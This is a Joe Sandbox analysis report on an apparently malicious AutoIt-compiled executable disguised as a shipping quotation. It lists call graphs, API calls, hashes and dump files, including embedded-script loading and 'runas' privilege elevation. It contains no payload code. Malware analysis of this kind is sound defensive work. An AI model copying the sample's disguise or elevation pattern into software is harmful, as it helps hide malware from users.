634470 GetNativeSystemInfo 97880->97884 97882 634476 97881->97882 97885 63109d 97882->97885 97886 63447a FreeLibrary 97882->97886 97884->97882 97887 6500a3 29 API calls 97885->97887 97886->97885 97887->97866 97888 63f7bf 97889 63f7d3 97888->97889 97890 63fcb6 97888->97890 97892 63fcc2 97889->97892 97893 64fddb 22 API calls 97889->97893 97925 63aceb 23 API calls 97890->97925 97926 63aceb 23 API calls 97892->97926 97895 63f7e5 97893->97895 97895->97892 97896 63f83e 97895->97896 97897 63fd3d 97895->97897 97899 641310 207 API calls 97896->97899 97914 63ed9d 97896->97914 97927 6a1155 22 API calls 97897->97927 97921 63ec76 97899->97921 97900 64fddb 22 API calls 97900->97921 97902 63fef7 97908 63a8c7 22 API calls 97902->97908 97902->97914 97904 684b0b 97929 6a359c 82 API calls 97904->97929 97905 684600 97910 63a8c7 22 API calls 97905->97910 97905->97914 97908->97914 97909 63a8c7 22 API calls 97909->97921 97910->97914 97912 63fbe3 97912->97914 97916 684bdc 97912->97916 97922 63f3ae 97912->97922 97913 63a961 22 API calls 97913->97921 97915 6500a3 29 API calls 97915->97921 97930 6a359c 82 API calls 97916->97930 97918 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97918->97921 97919 684beb 97931 6a359c 82 API calls 97919->97931 97920 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97920->97921 97921->97900 97921->97902 97921->97904 97921->97905 97921->97909 97921->97912 97921->97913 97921->97914 97921->97915 97921->97918 97921->97919 97921->97920 97921->97922 97923 6401e0 207 API calls 97921->97923 97924 6406a0 41 API calls 97921->97924 97922->97914 97928 6a359c 82 API calls 97922->97928 97923->97921 97924->97921 97925->97892 97926->97897 97927->97914 97928->97914 97929->97914 97930->97919 97931->97914 97932 6503fb 97933 650407 97932->97933 97961 64feb1 97933->97961 97935 65040e 97936 650561 97935->97936 97939 650438 97935->97939 97988 65083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 97936->97988 97938 650568 97989 654e52 28 API calls 97938->97989 97949 650477 97939->97949 97972 66247d 97939->97972 97941 65056e 97990 654e04 28 API calls 97941->97990 97945 650576 97946 650457 97952 6504d8 97949->97952 97984 654e1a 38 API calls 97949->97984 97950 6504de 97953 6504f3 97950->97953 97980 650959 97952->97980 97985 650992 GetModuleHandleW 97953->97985 97955 6504fa 97955->97938 97956 6504fe 97955->97956 97957 650507 97956->97957 97986 654df5 28 API calls 97956->97986 97987 650040 13 API calls 97957->97987 97960 65050f 97960->97946 97962 64feba 97961->97962 97991 650698 IsProcessorFeaturePresent 97962->97991 97964 64fec6 97992 652c94 10 API calls 97964->97992 97966 64fecb 97971 64fecf 97966->97971 97993 662317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97966->97993 97968 64fee6 97968->97935 97969 64fed8 97969->97968 97994 652cbd 8 API calls 97969->97994 97971->97935 97973 662494 97972->97973 97995 650a8c 97973->97995 97975 650451 97975->97946 97976 662421 97975->97976 97977 662450 97976->97977 97978 650a8c 5 API calls 97977->97978 97979 662479 97978->97979 97979->97949 98003 652340 97980->98003 97983 65097f 97983->97950 97984->97952 97985->97955 97986->97957 97987->97960 97988->97938 97989->97941 97990->97945 97991->97964 97992->97966 97993->97969 97994->97971 97996 650a95 97995->97996 97997 650a97 IsProcessorFeaturePresent 97995->97997 97996->97975 97999 650c5d 97997->97999 98002 650c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97999->98002 98001 650d40 98001->97975 98002->98001 98004 65096c GetStartupInfoW 98003->98004 98004->97983

                                                                            Executed Functions

                                                                            Function 006342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 245 6342de-63434d call 63a961 GetVersionExW call 636b57 250 673617-67362a 245->250 251 634353 245->251 252 67362b-67362f 250->252 253 634355-634357 251->253 254 673632-67363e 252->254 255 673631 252->255 256 673656 253->256 257 63435d-6343bc call 6393b2 call 6337a0 253->257 254->252 258 673640-673642 254->258 255->254 261 67365d-673660 256->261 272 6343c2-6343c4 257->272 273 6737df-6737e6 257->273 258->253 260 673648-67364f 258->260 260->250 263 673651 260->263 264 673666-6736a8 261->264 265 63441b-634435 GetCurrentProcess IsWow64Process 261->265 263->256 264->265 269 6736ae-6736b1 264->269 267 634437 265->267 268 634494-63449a 265->268 271 63443d-634449 267->271 268->271 274 6736b3-6736bd 269->274 275 6736db-6736e5 269->275 281 673824-673828 GetSystemInfo 271->281 282 63444f-63445e LoadLibraryA 271->282 272->261 276 6343ca-6343dd 272->276 277 673806-673809 273->277 278 6737e8 273->278 283 6736bf-6736c5 274->283 284 6736ca-6736d6 274->284 279 6736e7-6736f3 275->279 280 6736f8-673702 275->280 285 6343e3-6343e5 276->285 286 673726-67372f 276->286 290 6737f4-6737fc 277->290 291 67380b-67381a 277->291 287 6737ee 278->287 279->265 288 673715-673721 280->288 289 673704-673710 280->289 292 634460-63446e GetProcAddress 282->292 293 63449c-6344a6 GetSystemInfo 282->293 283->265 284->265 295 6343eb-6343ee 285->295 296 67374d-673762 285->296 297 673731-673737 286->297 298 67373c-673748 286->298 287->290 288->265 289->265 290->277 291->287 299 67381c-673822 291->299 292->293 300 634470-634474 GetNativeSystemInfo 292->300 294 634476-634478 293->294 305 634481-634493 294->305 306 63447a-63447b FreeLibrary 294->306 301 673791-673794 295->301 302 6343f4-63440f 295->302 303 673764-67376a 296->303 304 67376f-67377b 296->304 297->265 298->265 299->290 300->294 301->265 309 67379a-6737c1 301->309 307 634415 302->307 308 673780-67378c 302->308 303->265 304->265 306->305 307->265 308->265 310 6737c3-6737c9 309->310 311 6737ce-6737da 309->311 310->265 311->265
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0063430D
                                                                            • GetCurrentProcess.KERNEL32(?,006CCB64,00000000,?,?), ref: 00634422
                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00634429
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00634454
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00634466
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00634474
                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0063447B
                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 006344A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                            • API String ID: 2834427828-3101561225
                                                                            • Opcode ID: a63559da5bd6162c24c9cbcf14bb88b9be82f6800990b4f7e55cca837b2859d4
                                                                            • Instruction ID: b03e128e12e83d733822e328c408970c35ab16057cf0d0e0f7af0ce3e40bc736
                                                                            • Opcode Fuzzy Hash: a63559da5bd6162c24c9cbcf14bb88b9be82f6800990b4f7e55cca837b2859d4
                                                                            • Instruction Fuzzy Hash: BCA1E67190A2D0CFC715C7797C815E5FFE6AB26300F88D6ADE04593B22DE284505DB6D
                                                                            Function 006342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 771 6342a2-6342ba CreateStreamOnHGlobal 772 6342da-6342dd 771->772 773 6342bc-6342d3 FindResourceExW 771->773 774 6342d9 773->774 775 6735ba-6735c9 LoadResource 773->775 774->772 775->774 776 6735cf-6735dd SizeofResource 775->776 776->774 777 6735e3-6735ee LockResource 776->777 777->774 778 6735f4-6735fc 777->778 779 673600-673612 778->779 779->774
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,006350AA,?,?,00000000,00000000), ref: 006342B2
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006350AA,?,?,00000000,00000000), ref: 006342C9
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,006350AA,?,?,00000000,00000000,?,?,?,?,?,?,00634F20), ref: 006735BE
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,006350AA,?,?,00000000,00000000,?,?,?,?,?,?,00634F20), ref: 006735D3
                                                                            • LockResource.KERNEL32(006350AA,?,?,006350AA,?,?,00000000,00000000,?,?,?,?,?,?,00634F20,?), ref: 006735E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: 23db2834aa71d53b9cdbbf210e50088b47e40ec907f83e4bf79df59680d5f862
                                                                            • Instruction ID: 8604bbcaa76e4579a7d6aa33c29e44d136c9972d32611f01b5f57f0bcfe28acd
                                                                            • Opcode Fuzzy Hash: 23db2834aa71d53b9cdbbf210e50088b47e40ec907f83e4bf79df59680d5f862
                                                                            • Instruction Fuzzy Hash: 54117C70200700BFE7218BA6DC48F67BBBEEFC6B61F148169F416D6650DB71ED009A60
                                                                            Function 00672BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00632B6B
                                                                              • Part of subcall function 00633A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00701418,?,00632E7F,?,?,?,00000000), ref: 00633A78
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,006F2224), ref: 00672C10
                                                                            • ShellExecuteW.SHELL32(00000000,?,?,006F2224), ref: 00672C17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: runas
                                                                            • API String ID: 3686610399-4000483414
                                                                            • Opcode ID: 7c982ef35b9d211421c3141edae0dcc231e6923d5bba5f44f15f6c8910019063
                                                                            • Instruction ID: 99c77ee5e290fbee14c513b7ee692cc5456b9a343cd5bea456a3d07830787235
                                                                            • Opcode Fuzzy Hash: 7c982ef35b9d211421c3141edae0dcc231e6923d5bba5f44f15f6c8910019063
                                                                            • Instruction Fuzzy Hash: 95112931508386AAC748FF60D861DBEB7A79F90314F44542CF187421A2CF708A0ACB96
                                                                            Function 0063D730 Relevance: 21.6, APIs: 14, Instructions: 626windowsleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetInputState.USER32 ref: 0063D807
                                                                            • timeGetTime.WINMM ref: 0063DA07
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063DB28
                                                                            • TranslateMessage.USER32(?), ref: 0063DB7B
                                                                            • DispatchMessageW.USER32(?), ref: 0063DB89
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063DB9F
                                                                            • Sleep.KERNEL32(0000000A), ref: 0063DBB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                            • String ID:
                                                                            • API String ID: 2189390790-0
                                                                            • Opcode ID: f5193610422caab80218868c4b628e0309f857624dd349c7b445ffd32ae5a818
                                                                            • Instruction ID: b8590a233233aa242953f94f91d7c8b306a63849726b0ee32efc2cce99f736aa
                                                                            • Opcode Fuzzy Hash: f5193610422caab80218868c4b628e0309f857624dd349c7b445ffd32ae5a818
                                                                            • Instruction Fuzzy Hash: C042FE70608242EFD728DF24D894BAAB7E2FF46314F14865EE4668B391D770E845CBC6
                                                                            Function 00632CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00632D07
                                                                            • RegisterClassExW.USER32(00000030), ref: 00632D31
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00632D42
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00632D5F
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00632D6F
                                                                            • LoadIconW.USER32(000000A9), ref: 00632D85
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00632D94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 9bb6ae46914f2fc8d1de5991c67d34b8fa56909035105b5259ab121dacd6ed6f
                                                                            • Instruction ID: e5cc5c9df5a9e3ca2fa3b21c5780814eb03578c0e8097a9d1d803bee3b6516f0
                                                                            • Opcode Fuzzy Hash: 9bb6ae46914f2fc8d1de5991c67d34b8fa56909035105b5259ab121dacd6ed6f
                                                                            • Instruction Fuzzy Hash: E821E3B1D11348EFDB00DFA4E859BEDBBB5FB08710F00821AF615A62A0DBB51540CFA4
                                                                            Function 00632B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00632B8E
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00632B9D
                                                                            • LoadIconW.USER32(00000063), ref: 00632BB3
                                                                            • LoadIconW.USER32(000000A4), ref: 00632BC5
                                                                            • LoadIconW.USER32(000000A2), ref: 00632BD7
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00632BEF
                                                                            • RegisterClassExW.USER32(?), ref: 00632C40
                                                                              • Part of subcall function 00632CD4: GetSysColorBrush.USER32(0000000F), ref: 00632D07
                                                                              • Part of subcall function 00632CD4: RegisterClassExW.USER32(00000030), ref: 00632D31
                                                                              • Part of subcall function 00632CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00632D42
                                                                              • Part of subcall function 00632CD4: InitCommonControlsEx.COMCTL32(?), ref: 00632D5F
                                                                              • Part of subcall function 00632CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00632D6F
                                                                              • Part of subcall function 00632CD4: LoadIconW.USER32(000000A9), ref: 00632D85
                                                                              • Part of subcall function 00632CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00632D94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: 70a6ade5f7e87c0dab04a9c35a46db45f04d933a73a4c2f420d7392a2f08a599
                                                                            • Instruction ID: 7225ec861387c3495bc00b9d8ecd0a580b22133e97d11720c2f9b1fe218ff8bf
                                                                            • Opcode Fuzzy Hash: 70a6ade5f7e87c0dab04a9c35a46db45f04d933a73a4c2f420d7392a2f08a599
                                                                            • Instruction Fuzzy Hash: 5F212970E00318EBDB109FA5EC59BA9BFF5FB48B54F44811AF504A76A0DBB94540CF98
                                                                            Function 00633170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 316 633170-633185 317 633187-63318a 316->317 318 6331e5-6331e7 316->318 320 6331eb 317->320 321 63318c-633193 317->321 318->317 319 6331e9 318->319 324 6331d0-6331d8 DefWindowProcW 319->324 325 6331f1-6331f6 320->325 326 672dfb-672e23 call 6318e2 call 64e499 320->326 322 633265-63326d PostQuitMessage 321->322 323 633199-63319e 321->323 331 633219-63321b 322->331 328 6331a4-6331a8 323->328 329 672e7c-672e90 call 69bf30 323->329 330 6331de-6331e4 324->330 332 6331f8-6331fb 325->332 333 63321d-633244 SetTimer RegisterWindowMessageW 325->333 359 672e28-672e2f 326->359 335 6331ae-6331b3 328->335 336 672e68-672e77 call 69c161 328->336 329->331 353 672e96 329->353 331->330 339 633201-633214 KillTimer call 6330f2 call 633c50 332->339 340 672d9c-672d9f 332->340 333->331 337 633246-633251 CreatePopupMenu 333->337 343 672e4d-672e54 335->343 344 6331b9-6331be 335->344 336->331 337->331 339->331 346 672dd7-672df6 MoveWindow 340->346 347 672da1-672da5 340->347 343->324 356 672e5a-672e63 call 690ad7 343->356 351 633253-633263 call 63326f 344->351 352 6331c4-6331ca 344->352 346->331 354 672da7-672daa 347->354 355 672dc6-672dd2 SetFocus 347->355 351->331 352->324 352->359 353->324 354->352 360 672db0-672dc1 call 6318e2 354->360 355->331 356->324 359->324 364 672e35-672e48 call 6330f2 call 633837 359->364 360->331 364->324
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0063316A,?,?), ref: 006331D8
                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,0063316A,?,?), ref: 00633204
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00633227
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0063316A,?,?), ref: 00633232
                                                                            • CreatePopupMenu.USER32 ref: 00633246
                                                                            • PostQuitMessage.USER32(00000000), ref: 00633267
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 5c84e93fc7d71c8fe5fb1970bab0b19d92d19c8ea54dbbf7be0130f2c57f5b4d
                                                                            • Instruction ID: f59932527a930ce4fee6fcdb2cb530b76d4dab7970c53c68a670530c93cf1aad
                                                                            • Opcode Fuzzy Hash: 5c84e93fc7d71c8fe5fb1970bab0b19d92d19c8ea54dbbf7be0130f2c57f5b4d
                                                                            • Instruction Fuzzy Hash: 5E415931600220EBDB141B7CDD1DBBA3A5BEB05350F448229F50A867E1CB7A9F4197E9
                                                                            Function 0063344D Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00633A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00701418,?,00632E7F,?,?,?,00000000), ref: 00633A78
                                                                              • Part of subcall function 00633357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00633379
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0063356A
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0067318D
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006731CE
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00673210
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 338900592-2727554177
                                                                            • Opcode ID: 2986aa4c1b77c3f00f43ea74383ef3fa890511c5b7925c79569abc1430533c72
                                                                            • Instruction ID: 3b91fcb4134024bc32fa7091080235036a7b224c861c98d50350febf6473ccac
                                                                            • Opcode Fuzzy Hash: 2986aa4c1b77c3f00f43ea74383ef3fa890511c5b7925c79569abc1430533c72
                                                                            • Instruction Fuzzy Hash: 7A71C172404300DEC344DF64DC859ABFBE9FF84350F50892EF549932A2DB789A49CBA9
                                                                            Function 0067065B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 272COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 442 67065b-67068b call 67042f 445 6706a6-6706b2 call 665221 442->445 446 67068d-670698 call 65f2c6 442->446 451 6706b4-6706c9 call 65f2c6 call 65f2d9 445->451 452 6706cb-670714 call 67039a 445->452 453 67069a-6706a1 call 65f2d9 446->453 451->453 462 670716-67071f 452->462 463 670781-67078a GetFileType 452->463 460 67097d-670983 453->460 467 670756-67077c GetLastError call 65f2a3 462->467 468 670721-670725 462->468 464 6707d3-6707d6 463->464 465 67078c-6707bd GetLastError call 65f2a3 CloseHandle 463->465 471 6707df-6707e5 464->471 472 6707d8-6707dd 464->472 465->453 481 6707c3-6707ce call 65f2d9 465->481 467->453 468->467 473 670727-670754 call 67039a 468->473 476 6707e9-670837 call 66516a 471->476 477 6707e7 471->477 472->476 473->463 473->467 484 670847-67086b call 67014d 476->484 485 670839-670845 call 6705ab 476->485 477->476 481->453 492 67087e-6708c1 484->492 493 67086d 484->493 485->484 491 67086f-670879 call 6686ae 485->491 491->460 495 6708c3-6708c7 492->495 496 6708e2-6708f0 492->496 493->491 495->496 500 6708c9-6708dd 495->500 497 6708f6-6708fa 496->497 498 67097b 496->498 497->498 501 6708fc-67092f CloseHandle call 67039a 497->501 498->460 500->496 504 670963-670977 501->504 505 670931-67095d GetLastError call 65f2a3 call 665333 501->505 504->498 505->504
                                                                            APIs
                                                                              • Part of subcall function 0067039A: CreateFileW.KERNELBASE(00000000,00000000,?,00670704,?,?,00000000,?,00670704,00000000,0000000C), ref: 006703B7
                                                                            • GetLastError.KERNEL32 ref: 0067076F
                                                                            • GetFileType.KERNELBASE(00000000), ref: 00670782
                                                                            • GetLastError.KERNEL32 ref: 0067078C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006707B5
                                                                            • CloseHandle.KERNEL32(?), ref: 006708FF
                                                                            • GetLastError.KERNEL32 ref: 00670931
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
